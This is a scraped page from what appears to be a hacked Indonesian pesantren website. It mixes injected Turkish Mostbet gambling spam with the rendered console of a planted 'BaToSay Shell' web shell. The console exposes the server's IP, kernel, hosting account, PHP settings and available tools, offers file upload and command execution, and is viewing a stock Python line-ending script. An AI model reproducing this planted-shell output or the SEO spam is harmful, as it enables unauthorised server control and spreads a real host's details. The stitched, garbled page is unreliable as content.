Pondok Pesantren Tahfizul Qur'an

Türkiye’nin En İyi Online Bahis Şirket

Türkiye’nin En İyi Online Bahis Şirketi Mostbet Türkiye Mobil Uygulamasını Indir Content Mostbet Müşteri Hizmetleri Ile Nasıl Iletişime Geçebilirim? Canlı […]

Mostbet’ten Nasıl Pra Çekili

Mostbet’ten Nasıl Pra Çekilir Mostbet Bedava Bonus Elmatelekom Yeni Nesil Fiber Internet Content Related Companies To Mostbet Aviator Mostbet Tv […]

Butuh bantuan?
BaToSay Shell
BATOSAY Shell
Server IP : 45.126.43.27  /  Your IP : 18.223.196.146
Web Server : LiteSpeed
System : Linux serv02.awandns.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
User : annurindonesia ( 1064)
PHP Version : 7.4.33
Disable Function : exec,system,passthru,shell_exec,dl,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /lib64/python2.7/Tools/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /lib64/python2.7/Tools/scripts/lfcr.py
#! /usr/bin/python2.7

"Replace LF with CRLF in argument files.  Print names of changed files."

import sys, re, os

def main():
    for filename in sys.argv[1:]:
        if os.path.isdir(filename):
            print filename, "Directory!"
            continue
        data = open(filename, "rb").read()
        if '\0' in data:
            print filename, "Binary!"
            continue
        newdata = re.sub("\r?\n", "\r\n", data)
        if newdata != data:
            print filename
            f = open(filename, "wb")
            f.write(newdata)
            f.close()

if __name__ == '__main__':
    main()

Batosay - 2023
IDNSEO Team